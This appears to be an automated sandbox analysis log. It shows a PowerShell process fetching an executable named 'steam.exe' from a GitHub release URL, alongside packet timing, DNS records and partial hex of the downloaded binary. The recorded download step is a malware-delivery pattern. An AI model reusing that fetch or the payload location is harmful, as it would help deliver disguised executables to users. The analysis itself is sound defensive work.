                                              Jun 4, 2024 13:41:08.420643091 CEST49732443192.168.2.4185.199.110.133
                                              Jun 4, 2024 13:41:08.420650005 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.420866013 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.420881987 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.420923948 CEST49732443192.168.2.4185.199.110.133
                                              Jun 4, 2024 13:41:08.420931101 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.420944929 CEST49732443192.168.2.4185.199.110.133
                                              Jun 4, 2024 13:41:08.421241999 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.421262980 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.421294928 CEST49732443192.168.2.4185.199.110.133
                                              Jun 4, 2024 13:41:08.421302080 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.421314001 CEST49732443192.168.2.4185.199.110.133
                                              Jun 4, 2024 13:41:08.421693087 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.421710968 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.421742916 CEST49732443192.168.2.4185.199.110.133
                                              Jun 4, 2024 13:41:08.421747923 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.421760082 CEST49732443192.168.2.4185.199.110.133
                                              Jun 4, 2024 13:41:08.421776056 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.421789885 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.421832085 CEST49732443192.168.2.4185.199.110.133
                                              Jun 4, 2024 13:41:08.421839952 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.421852112 CEST49732443192.168.2.4185.199.110.133
                                              Jun 4, 2024 13:41:08.422050953 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.422071934 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.422105074 CEST49732443192.168.2.4185.199.110.133
                                              Jun 4, 2024 13:41:08.422110081 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.422132969 CEST49732443192.168.2.4185.199.110.133
                                              Jun 4, 2024 13:41:08.422308922 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.422329903 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.422364950 CEST49732443192.168.2.4185.199.110.133
                                              Jun 4, 2024 13:41:08.422384977 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.422396898 CEST49732443192.168.2.4185.199.110.133
                                              Jun 4, 2024 13:41:08.422641039 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.422661066 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.422696114 CEST49732443192.168.2.4185.199.110.133
                                              Jun 4, 2024 13:41:08.422703028 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.422723055 CEST49732443192.168.2.4185.199.110.133
                                              Jun 4, 2024 13:41:08.422841072 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.422861099 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.422903061 CEST49732443192.168.2.4185.199.110.133
                                              Jun 4, 2024 13:41:08.422909975 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.423060894 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.423082113 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.423116922 CEST49732443192.168.2.4185.199.110.133
                                              Jun 4, 2024 13:41:08.423121929 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.423145056 CEST49732443192.168.2.4185.199.110.133
                                              Jun 4, 2024 13:41:08.423471928 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.423484087 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.423523903 CEST49732443192.168.2.4185.199.110.133
                                              Jun 4, 2024 13:41:08.423530102 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.423542976 CEST49732443192.168.2.4185.199.110.133
                                              Jun 4, 2024 13:41:08.423871994 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.423887968 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.423921108 CEST49732443192.168.2.4185.199.110.133
                                              Jun 4, 2024 13:41:08.423927069 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.423957109 CEST49732443192.168.2.4185.199.110.133
                                              Jun 4, 2024 13:41:08.423979998 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.423991919 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.424031019 CEST49732443192.168.2.4185.199.110.133
                                              Jun 4, 2024 13:41:08.424036980 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.424065113 CEST49732443192.168.2.4185.199.110.133
                                              Jun 4, 2024 13:41:08.424177885 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.424195051 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.424283981 CEST49732443192.168.2.4185.199.110.133
                                              Jun 4, 2024 13:41:08.424283981 CEST49732443192.168.2.4185.199.110.133
                                              Jun 4, 2024 13:41:08.424290895 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.424376965 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.424387932 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.424423933 CEST49732443192.168.2.4185.199.110.133
                                              Jun 4, 2024 13:41:08.424431086 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.424444914 CEST49732443192.168.2.4185.199.110.133
                                              Jun 4, 2024 13:41:08.424778938 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.424796104 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.424834013 CEST49732443192.168.2.4185.199.110.133
                                              Jun 4, 2024 13:41:08.424839973 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.424861908 CEST49732443192.168.2.4185.199.110.133
                                              Jun 4, 2024 13:41:08.425183058 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.425193071 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.425231934 CEST49732443192.168.2.4185.199.110.133
                                              Jun 4, 2024 13:41:08.425237894 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.425250053 CEST49732443192.168.2.4185.199.110.133
                                              Jun 4, 2024 13:41:08.425465107 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.425479889 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.425512075 CEST49732443192.168.2.4185.199.110.133
                                              Jun 4, 2024 13:41:08.425518036 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.425540924 CEST49732443192.168.2.4185.199.110.133
                                              Jun 4, 2024 13:41:08.425852060 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.425867081 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.425900936 CEST49732443192.168.2.4185.199.110.133
                                              Jun 4, 2024 13:41:08.425906897 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.425929070 CEST49732443192.168.2.4185.199.110.133
                                              Jun 4, 2024 13:41:08.426393032 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.426409960 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.426444054 CEST49732443192.168.2.4185.199.110.133
                                              Jun 4, 2024 13:41:08.426449060 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.426476002 CEST49732443192.168.2.4185.199.110.133
                                              Jun 4, 2024 13:41:08.426635027 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.426650047 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.426687956 CEST49732443192.168.2.4185.199.110.133
                                              Jun 4, 2024 13:41:08.426695108 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.426712990 CEST49732443192.168.2.4185.199.110.133
                                              Jun 4, 2024 13:41:08.427009106 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.427023888 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.427061081 CEST49732443192.168.2.4185.199.110.133
                                              Jun 4, 2024 13:41:08.427067041 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.427093029 CEST49732443192.168.2.4185.199.110.133
                                              Jun 4, 2024 13:41:08.427227974 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.427241087 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.427282095 CEST49732443192.168.2.4185.199.110.133
                                              Jun 4, 2024 13:41:08.427289963 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.427304983 CEST49732443192.168.2.4185.199.110.133
                                              Jun 4, 2024 13:41:08.427465916 CEST49732443192.168.2.4185.199.110.133
                                              Jun 4, 2024 13:41:08.427566051 CEST49732443192.168.2.4185.199.110.133
                                              Jun 4, 2024 13:41:08.427598953 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.427613020 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.427651882 CEST49732443192.168.2.4185.199.110.133
                                              Jun 4, 2024 13:41:08.427658081 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.427671909 CEST49732443192.168.2.4185.199.110.133
                                              Jun 4, 2024 13:41:08.427764893 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.427779913 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.427856922 CEST49732443192.168.2.4185.199.110.133
                                              Jun 4, 2024 13:41:08.427865028 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.428092957 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.428107977 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.428162098 CEST49732443192.168.2.4185.199.110.133
                                              Jun 4, 2024 13:41:08.428169012 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.428237915 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.428255081 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.428289890 CEST49732443192.168.2.4185.199.110.133
                                              Jun 4, 2024 13:41:08.428296089 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.428320885 CEST49732443192.168.2.4185.199.110.133
                                              Jun 4, 2024 13:41:08.428385019 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.428396940 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.428452969 CEST49732443192.168.2.4185.199.110.133
                                              Jun 4, 2024 13:41:08.428452969 CEST49732443192.168.2.4185.199.110.133
                                              Jun 4, 2024 13:41:08.428461075 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.428509951 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.428531885 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.428563118 CEST49732443192.168.2.4185.199.110.133
                                              Jun 4, 2024 13:41:08.428569078 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.428584099 CEST49732443192.168.2.4185.199.110.133
                                              Jun 4, 2024 13:41:08.428661108 CEST49732443192.168.2.4185.199.110.133
                                              Jun 4, 2024 13:41:08.428688049 CEST49732443192.168.2.4185.199.110.133
                                              Jun 4, 2024 13:41:08.428690910 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.428705931 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.428744078 CEST49732443192.168.2.4185.199.110.133
                                              Jun 4, 2024 13:41:08.428750992 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.428766012 CEST49732443192.168.2.4185.199.110.133
                                              Jun 4, 2024 13:41:08.428852081 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.428868055 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.428900957 CEST49732443192.168.2.4185.199.110.133
                                              Jun 4, 2024 13:41:08.428908110 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.428932905 CEST49732443192.168.2.4185.199.110.133
                                              Jun 4, 2024 13:41:08.429042101 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.429059982 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.429105997 CEST49732443192.168.2.4185.199.110.133
                                              Jun 4, 2024 13:41:08.429112911 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.429127932 CEST49732443192.168.2.4185.199.110.133
                                              Jun 4, 2024 13:41:08.429363966 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.429378986 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.429420948 CEST49732443192.168.2.4185.199.110.133
                                              Jun 4, 2024 13:41:08.429426908 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.429442883 CEST49732443192.168.2.4185.199.110.133
                                              Jun 4, 2024 13:41:08.429621935 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.429635048 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.429686069 CEST49732443192.168.2.4185.199.110.133
                                              Jun 4, 2024 13:41:08.429694891 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.429874897 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.429892063 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.429929972 CEST49732443192.168.2.4185.199.110.133
                                              Jun 4, 2024 13:41:08.429936886 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.429949999 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.429956913 CEST49732443192.168.2.4185.199.110.133
                                              Jun 4, 2024 13:41:08.430001020 CEST49732443192.168.2.4185.199.110.133
                                              Jun 4, 2024 13:41:08.430007935 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.430030107 CEST44349732185.199.110.133192.168.2.4
                                              Jun 4, 2024 13:41:08.430069923 CEST49732443192.168.2.4185.199.110.133
                                              Jun 4, 2024 13:41:08.430330038 CEST49732443192.168.2.4185.199.110.133
                                              TimestampSource PortDest PortSource IPDest IP
                                              Jun 4, 2024 13:41:05.027652979 CEST5227853192.168.2.41.1.1.1
                                              Jun 4, 2024 13:41:05.039120913 CEST53522781.1.1.1192.168.2.4
                                              Jun 4, 2024 13:41:06.329958916 CEST6238953192.168.2.41.1.1.1
                                              Jun 4, 2024 13:41:06.337516069 CEST53623891.1.1.1192.168.2.4
                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Jun 4, 2024 13:41:05.027652979 CEST192.168.2.41.1.1.10x7074Standard query (0)github.comA (IP address)IN (0x0001)false
                                              Jun 4, 2024 13:41:06.329958916 CEST192.168.2.41.1.1.10x3459Standard query (0)objects.githubusercontent.comA (IP address)IN (0x0001)false
                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Jun 4, 2024 13:41:05.039120913 CEST1.1.1.1192.168.2.40x7074No error (0)github.com140.82.121.4A (IP address)IN (0x0001)false
                                              Jun 4, 2024 13:41:06.337516069 CEST1.1.1.1192.168.2.40x3459No error (0)objects.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                              Jun 4, 2024 13:41:06.337516069 CEST1.1.1.1192.168.2.40x3459No error (0)objects.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                              Jun 4, 2024 13:41:06.337516069 CEST1.1.1.1192.168.2.40x3459No error (0)objects.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                              Jun 4, 2024 13:41:06.337516069 CEST1.1.1.1192.168.2.40x3459No error (0)objects.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                              Jun 4, 2024 13:41:23.992185116 CEST1.1.1.1192.168.2.40x4c5bNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                              Jun 4, 2024 13:41:23.992185116 CEST1.1.1.1192.168.2.40x4c5bNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                              Jun 4, 2024 13:41:37.017641068 CEST1.1.1.1192.168.2.40x3f2fNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                              Jun 4, 2024 13:41:37.017641068 CEST1.1.1.1192.168.2.40x3f2fNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                              • github.com
                                              • objects.githubusercontent.com
                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.449731140.82.121.44437324C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              TimestampBytes transferredDirectionData
                                              2024-06-04 11:41:05 UTC105OUTGET /tarzanre/myrepo/releases/download/a/steam.exe HTTP/1.1
                                              Host: github.com
                                              Connection: Keep-Alive
                                              2024-06-04 11:41:06 UTC994INHTTP/1.1 302 Found
                                              Server: GitHub.com
                                              Date: Tue, 04 Jun 2024 11:41:06 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                              Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/672232730/d6a03019-07cf-4d6d-ad93-77d112cc61d1?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240604%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240604T114106Z&X-Amz-Expires=300&X-Amz-Signature=0c3e0f644161a8dc3bf62bb7d99a54823e87ce0d99b2b33952c96ac71daec4b0&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=672232730&response-content-disposition=attachment%3B%20filename%3Dsteam.exe&response-content-type=application%2Foctet-stream
                                              Cache-Control: no-cache
                                              Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                              X-Frame-Options: deny
                                              X-Content-Type-Options: nosniff
                                              X-XSS-Protection: 0
                                              Referrer-Policy: no-referrer-when-downgrade
                                              2024-06-04 11:41:06 UTC3021INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e
                                              Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.449732185.199.110.1334437324C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              TimestampBytes transferredDirectionData
                                              2024-06-04 11:41:06 UTC585OUTGET /github-production-release-asset-2e65be/672232730/d6a03019-07cf-4d6d-ad93-77d112cc61d1?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240604%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240604T114106Z&X-Amz-Expires=300&X-Amz-Signature=0c3e0f644161a8dc3bf62bb7d99a54823e87ce0d99b2b33952c96ac71daec4b0&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=672232730&response-content-disposition=attachment%3B%20filename%3Dsteam.exe&response-content-type=application%2Foctet-stream HTTP/1.1
                                              Host: objects.githubusercontent.com
                                              Connection: Keep-Alive
                                              2024-06-04 11:41:07 UTC813INHTTP/1.1 200 OK
                                              Connection: close
                                              Content-Length: 10426648
                                              Content-Type: application/octet-stream
                                              Content-MD5: MnuO0M3rrmlicYZWtacqTA==
                                              Last-Modified: Sat, 29 Jul 2023 11:23:40 GMT
                                              ETag: "0x8DB902642DB121E"
                                              Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                              x-ms-request-id: 9ec76d0b-c01e-0025-675f-b64829000000
                                              x-ms-version: 2020-10-02
                                              x-ms-creation-time: Sat, 29 Jul 2023 11:23:40 GMT
                                              x-ms-lease-status: unlocked
                                              x-ms-lease-state: available
                                              x-ms-blob-type: BlockBlob
                                              Content-Disposition: attachment; filename=steam.exe
                                              x-ms-server-encrypted: true
                                              Via: 1.1 varnish, 1.1 varnish
                                              Accept-Ranges: bytes
                                              Age: 0
                                              Date: Tue, 04 Jun 2024 11:41:07 GMT
                                              X-Served-By: cache-iad-kcgs7200162-IAD, cache-dfw-kdfw8210120-DFW
                                              X-Cache: HIT, MISS
                                              X-Cache-Hits: 3, 0
                                              X-Timer: S1717501267.034601,VS0,VE163
                                              2024-06-04 11:41:07 UTC1378INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 68 72 ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0b 00 69 f1 c4 64 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 02 26 00 e8 01 00 00 ec 9e 00 00 3e 00 00 b0 14 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 90 9f 00 00 04 00 00 93 be 9f 00 02 00 60 01 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00
                                              Data Ascii: MZ@hr!L!This program cannot be run in DOS mode.$PEdid.&>@`
                                              2024-06-04 11:41:07 UTC1378INData Raw: 24 20 48 8b 05 05 a6 9e 00 44 8b 08 e8 c5 c0 01 00 90 48 83 c4 38 c3 0f 1f 80 00 00 00 00 41 55 41 54 55 57 56 53 48 81 ec 98 00 00 00 31 c0 b9 0d 00 00 00 48 8d 54 24 20 48 89 d7 f3 48 ab 48 8b 3d f8 a4 9e 00 44 8b 0f 45 85 c9 0f 85 9c 02 00 00 65 48 8b 04 25 30 00 00 00 48 8b 1d 2c a5 9e 00 31 ed 48 8b 70 08 4c 8b 25 63 31 9f 00 eb 11 48 39 c6 0f 84 14 02 00 00 b9 e8 03 00 00 41 ff d4 48 89 e8 f0 48 0f b1 33 48 85 c0 75 e2 48 8b 35 08 a5 9e 00 31 ed 8b 06 83 f8 01 0f 84 02 02 00 00 8b 06 85 c0 0f 84 71 02 00 00 c7 05 ef ed 9e 00 01 00 00 00 8b 06 83 f8 01 0f 84 f8 01 00 00 85 ed 0f 84 11 02 00 00 48 8b 05 0d a4 9e 00 48 8b 00 48 85 c0 74 0c 45 31 c0 ba 02 00 00 00 31 c9 ff d0 e8 d4 31 01 00 48 8d 0d 9d 35 01 00 ff 15 d3 30 9f 00 48 8b 15 80 a4 9e 00 48
                                              Data Ascii: $ HDH8AUATUWVSH1HT$ HHH=DEeH%0H,1HpL%c1H9AHH3HuH51qHHHtE111H50HH
                                              2024-06-04 11:41:07 UTC1378INData Raw: 00 48 8d 50 72 66 c7 00 00 00 48 83 c0 02 48 39 d0 75 f2 c3 48 8d 05 01 12 9f 00 48 8d 50 12 66 c7 00 00 00 48 83 c0 02 48 39 d0 75 f2 c3 48 8d 05 67 11 9f 00 48 8d 50 74 66 c7 00 00 00 48 83 c0 02 48 39 d0 75 f2 c3 48 8d 05 2d 11 9f 00 48 8d 50 14 66 c7 00 00 00 48 83 c0 02 48 39 d0 75 f2 c3 48 8d 05 d3 0f 9f 00 48 8d 90 30 01 00 00 66 c7 00 00 00 48 83 c0 02 48 39 d0 75 f2 c3 48 8d 05 76 0f 9f 00 48 8d 50 26 66 c7 00 00 00 48 83 c0 02 48 39 d0 75 f2 c3 48 8d 05 34 0f 9f 00 48 8d 50 0b c6 00 00 48 83 c0 01 48 39 d0 75 f4 c3 48 8d 05 04 0f 9f 00 48 8d 50 0f c6 00 00 48 83 c0 01 48 39 d0 75 f4 c3 48 8d 05 cc 0e 9f 00 48 8d 50 0d c6 00 00 48 83 c0 01 48 39 d0 75 f4 c3 48 8d 05 94 0e 9f 00 48 8d 50 11 c6 00 00 48 83 c0 01 48 39 d0 75 f4 c3 48 8d 05 5c 0e 9f
                                              Data Ascii: HPrfHH9uHHPfHH9uHgHPtfHH9uH-HPfHH9uHH0fHH9uHvHP&fHH9uH4HPHH9uHHPHH9uHHPHH9uHHPHH9uH\
                                              2024-06-04 11:41:07 UTC1378INData Raw: 8d 05 54 04 9f 00 48 8d 50 10 c6 00 00 48 83 c0 01 48 39 d0 75 f4 c3 48 8d 05 1c 04 9f 00 48 8d 50 0f c6 00 00 48 83 c0 01 48 39 d0 75 f4 c3 48 8d 05 ec 03 9f 00 48 8d 50 0b c6 00 00 48 83 c0 01 48 39 d0 75 f4 c3 48 8d 05 bc 03 9f 00 48 8d 50 0e c6 00 00 48 83 c0 01 48 39 d0 75 f4 c3 48 8d 05 84 03 9f 00 48 8d 50 12 c6 00 00 48 83 c0 01 48 39 d0 75 f4 c3 48 8d 05 4c 03 9f 00 48 8d 50 12 c6 00 00 48 83 c0 01 48 39 d0 75 f4 c3 48 8d 05 14 03 9f 00 48 8d 50 0e c6 00 00 48 83 c0 01 48 39 d0 75 f4 c3 48 8d 05 dc 02 9f 00 48 8d 50 17 c6 00 00 48 83 c0 01 48 39 d0 75 f4 c3 48 8d 05 a4 02 9f 00 48 8d 50 13 c6 00 00 48 83 c0 01 48 39 d0 75 f4 c3 48 8d 05 6c 02 9f 00 48 8d 50 13 c6 00 00 48 83 c0 01 48 39 d0 75 f4 c3 48 8d 05 34 02 9f 00 48 8d 50 0f c6 00 00 48 83
                                              Data Ascii: THPHH9uHHPHH9uHHPHH9uHHPHH9uHHPHH9uHLHPHH9uHHPHH9uHHPHH9uHHPHH9uHlHPHH9uH4HPH
